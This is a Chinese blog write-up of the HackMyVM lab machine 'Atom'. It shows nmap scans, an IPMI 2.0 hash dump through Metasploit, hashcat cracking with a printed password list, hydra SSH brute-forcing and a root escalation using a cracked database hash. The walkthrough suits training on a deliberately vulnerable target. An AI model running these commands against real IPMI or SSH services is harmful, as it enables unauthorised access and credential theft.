Atom - hackmyvm

已于 2024-07-20 02:32:13 修改
阅读量297 收藏 4
点赞数 4
分类专栏: hackmyvm靶场合集 文章标签: 网络安全 网络 linux 服务器 安全
于 2024-07-20 02:30:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/140563153
版权

简介

靶机名称:Atom

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Atom

本地环境

虚拟机:vitual box

靶场IP(Atom):192.168.56.101

跳板机IP(windows 11):192.168.56.1 192.168.190.100

渗透机IP(kali):192.168.190.131

扫描

nmap -Pn -sT -p0- 192.168.56.101 --min-rate=10000 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
sudo nmap -sT -sV -sC -O -p$ports 192.168.56.101 -oA nmapscan/detail

Host is up (0.0011s latency).

PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
25/tcp  open  tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
110/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.44 seconds

感觉有点不对经,再加个udp扫描

sudo nmap -sU --min-rate=10000 -p0- 192.168.56.101/32 -oA nmapscan/udp ;ports_udp=$(grep open ./nmapscan/udp.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports_udp >> nmapscan/udp_ports;
sudo nmap -sU -sV -sC -p$ports_udp 192.168.56.101/32 -oA nmapscan/detail_udp

PORT    STATE SERVICE  VERSION
623/udp open  asf-rmcp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.94SVN%I=7%D=7/20%Time=669B668D%P=x86_64-pc-linux-gnu%r(
SF:ipmi-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x008\0\
SF:x01\x97\x04\x03\0\0\0\0\t");

开启了一个rmcp服务,HackTricks上有专门讲这个服务的文章

https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi

IPMI

利用点就是623端口。IPMI是智能型平台管理接口(Intelligent Platform Management Interface)的缩写,是管理基于Intel结构的企业系统中所使用的外围设备采用的一种工业标准。这个协议在十年前爆出过 IPMI v2.0密码哈希泄露漏洞,主要是IPMI2.0协议支持RMCP+机制引入导致,远程攻击者可以将HDM响应的RAKP包中密码的哈希值抓取,从而实施离线口令猜测攻击。

我们可以使用msf的auxiliary/scanner/ipmi/ipmi_dumphashes模块进行攻击。这里记得设置自己的用户名字典和导出哈希文件,方便后续爆破。

image-20240720013104844

哪怕以hashcat格式输出还是没办法直接送进hashcat去爆……稍微处理一下,把hash摘出来

image-20240720014039633

cat hashes | cut -d ":" -f 2- > hash_res

这个hash不是linux的hash值,是IPMI2的特有格式hash,能在hashcat中搜到。

image-20240720011119282

hashcat -a 0 -m 7300 ./hash_res  $HVV_Tool/8_dict/kali.txt --outfile-format 2 --force --show > hash_res

image-20240720013853854

爆出来结果为

cukorborso
honda
TWEETY1
290992
jesus06
2468
122987
milo123
dezzy
tripod
chatroom
evan
071590
081704
number17
numberone
billandben
emeralds
trick1
241107
mackenzie2
jiggaman
phones
515253
jaffa1
darell
djones
batman!
090506
kittyboo
me4life
castillo1
sexymoma
10101979
poynter
120691

最后和用户名进行合并即可

 cat hashes | grep -Po "(?= ).+?(?=:)" | sed "s/^[ \t]*//;s/[ \t]*$//" > username; paste -d: username ./hash_res > ssh_dic

image-20240720020723701

ssh爆破

使用hydra爆破即可

hydra -t 8 -s 22 -C ./ssh_dic 192.168.56.101 ssh

image-20240720021123305

得到账密为onida:jiggaman

连接,得到user.txt

image-20240720021253795

提权

有一个网站,端口监听回环地址。本来我还打算用ssh开个转发,然后发现数据库就在旁边。

image-20240720022434927

脱下来,直接找到账密

image-20240720022503664

hashcat爆破

 hashcat -a 0 -m 3200 ./hash2  $HVV_Tool/8_dict/kali.txt  --force

image-20240720022740557

madison

su root,输入该密码,提权成功

image-20240720022827867

结束

古明地核
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Atomatom-beautify插件安装
hope-dwj的博客
06-22 3186
按照网上指点,在终端输入四行命令:1.cd ~/.atom/packages2.git clone https://github.com/Glavin001/atom-beautify.git3.cd atom-beautify4.apm install但是执行4时出现 command not found解决方案:atom软件安装完毕后没有安装shell command完事后,重新执行4.apm ...
Atom编辑器之atom-beautify、emmet、atom-ternjs的安装和使用
inhumming的博客
01-03 6285
听人云,不如自己试。 许久以来,工作中一直需要写前端代码(html、css、javascript、jquery),但一直苦于找不到比较好的开发工具能像写后台代码那样,美化代码、智能提示、智能补全等等。直到前不久,朋友推荐一个非常不错的编辑器Atom,于是就从网上下载试了试,用了一段时间后,发现还是蛮不错哒。 其实Atom好就好在她可以安装的插件非常的强大,可以无限的扩展。下面我对atom的安装
Atom-beautify插件的安装,使用过程
lu12077的博客
09-13 1949
Atom-beautify插件的安装,使用过程中的 错误,警告问题的解决方法
Llama中文社区开源预训练Atom-7B-chat大模型体验与本地化部署实测(基于CPU,适配无GPU的场景)
weixin_48087464的博客
10-13 2841
Llama中文社区开源预训练Atom-7B-chat大模型体验与本地化部署实测(基于CPU,适配无GPU的场景)
0001-atom编辑器之atom-beautify和uncrustify的安装及配置方法
热门推荐
wakeya的专栏
01-10 1万+
atom-beautify和uncrustify的安装及配置方法1.atom-beautify插件的安装
atom离线安装插件(atom-beautify)
harveySOT
05-29 1588
由于网络原因,直接在atom上安装插件会异常的慢(基本无法安装成功),因此采用离线安装的方式,本文通过atom-beautify插件的安装步骤来介绍atom如何去离线安装插件。 1. 准备 npm的安装:安装步骤比较简单,可以自行百度安装。 2. 下载atom插件 下载atom插件的方式比较多,我这里建议去GitHub网站下载。 1)在GitHub网站上找到atom-beautify: 2)获取...
Atom-常用插件大全
NOT NULL
02-26 1万+
ctrl+shift+p,打开atom命令面板 智能提示、补全 atom-ternjs (自动补全,与Tern原子的JavaScript代码智能。添加对ES5,ES6(JavaScript 2015),Node.js,jQuery和Angular的支持。可通过插件扩展。使用建议提供程序自动完成加。) https://atom.io/packages/atom-ternjs a...
Atom汉化之Atom-Simplified-Chinese-Menu
weixin_34337381的博客
08-12 624
转载于:https://www.cnblogs.com/chenxi-hxl/p/9463877.html
atom-图片粘贴
Vincent-Sheng的博客
05-10 4420
图片粘贴(markdown-image-paste) 图片功能支持的好坏直接决定了我是否选择使用一个Markdown编辑器。也有不少编辑器和在线的图床绑定,但是这种方式受限于网络。虽然Markdown支持插入本地图片,但是每次插入新图片都是一堆重复操作:截图-命名-保存-插入。markdown-image-paste将这些操作一步完成: 使用截图工具将图片复制到系统剪切板。 在Markdow...
Atom-atom-import-js,用于importjs的atom插件。对Galooshi/Atom的贡献.zip
09-18
Atom-atom-import-js 是一个专为 Atom 文本编辑器设计的插件,它与 Galooshi/Atom 社区紧密相连,旨在提升开发者的工作效率,特别是处理JavaScript代码时的导入功能。Atom是一款由GitHub开发的现代、可高度自定义的...
atom-x64-windows.zip
12-21
Atom官网Windows 64位的安装包,因官网下载速度太慢上传此包,若想官网下载也可通过手机开热点下载官方的包,会比用wifi下载的速度要快,积分上涨的话私信我修改,刚开始上传时设置的0,后来自己变成了30
Atom-x64-windows官网最新版本
08-06
Atom-x64-windows官网最新版本是一款专为Windows操作系统设计的64位文本编辑器,由GitHub开发并维护。Atom作为一款开源的代码编辑器,它提供了丰富的功能和高度的自定义性,深受开发者喜爱。这款软件是官方的最新...
atom-mac.zip
03-30
标题“atom-mac.zip”暗示了这是一个针对MacOS系统的Atom编辑器的压缩包文件。这个压缩文件可能包含了Atom编辑器的安装程序或便携版应用,让用户能够快速在Mac电脑上使用这款强大的文本编辑工具。 描述中的“atom-...
Atom-atom-toggle,切换关键字。贡献T9MD/原子.zip
09-18
Atom-atom-toggle是一款基于Atom文本编辑器的插件,它主要功能是实现关键字的快速切换。Atom是由GitHub开发的一款开源文本编辑器,采用Web技术构建,具有高度的可定制性和灵活性,深受开发者喜爱。这款插件是T9MD...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【Socket 编程】基于UDP协议建立多人聊天室
稻草人敲代码的博客
07-19 234
对于服务端来说,除了要接收消息之外,还要实现一个路由转发模块,该路由转发模块可以将相应发送给所有连接的客户端。而对于客户端来说,除了要发送消息给聊天室,还要能实时看到其它所有客户端的消息。下面来看看具体实现的代码,代码只给出核心模块,其余代码模块代码可以借鉴我之前的博客。具体来说,服务器类实现的功能只有收消息。
网络协议-SOTP 协议格式
ziyunLLL的博客
07-19 249
SOTP(Secure Overlay Transport Protocol)是一种安全的覆盖层传输协议,旨在提供增强的安全性和功能。2.密钥管理:密钥的管理和交换是协议安全的重要部分,通常使用公钥基础设施(PKI)或密钥交换协议(如 Diffie-Hellman)。1.安全性:确保加密算法和认证算法的安全性。常用的加密算法包括 AES,常用的认证算法包括 HMAC-SHA256。3.性能:加密和认证会增加计算开销,需要在安全性和性能之间找到平衡。SOTP 协议格式的一般结构。
docker build时的网络问题
最新发布
flynetcn的专栏
07-19 166
docker build网络问题
atom-setup下载
12-25
atom-setup 是一个用于下载和安装 Atom 编辑器的工具。它提供了一个简单、方便的方式来获取最新版本的 Atom,并将其安装到您的计算机上。 要下载 atom-setup,您可以前往 Atom 官方网站的下载页面,从其中选择适合您操作系统的版本,然后点击下载按钮。下载完成后,您可以双击运行安装程序,根据提示完成安装过程。 安装完成后,您将获得一个功能强大且易于使用的代码编辑器,可以用于编写各种编程语言的代码。Atom 支持插件和主题的定制,让您可以根据自己的喜好来扩展和美化编辑器的功能和外观。 除了基本的代码编辑功能外,Atom 还提供了许多实用的功能,如自动补全、代码折叠、多光标编辑等,这些功能可以让您更高效地编写代码。 总之,atom-setup 是一个方便的工具,可以帮助您快速下载并安装 Atom 编辑器,让您可以轻松地开始编写代码。如果您是一名开发者或者对编程有兴趣,不妨试试使用 Atom 编辑器,它可能会成为您编程生涯中的得力助手。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值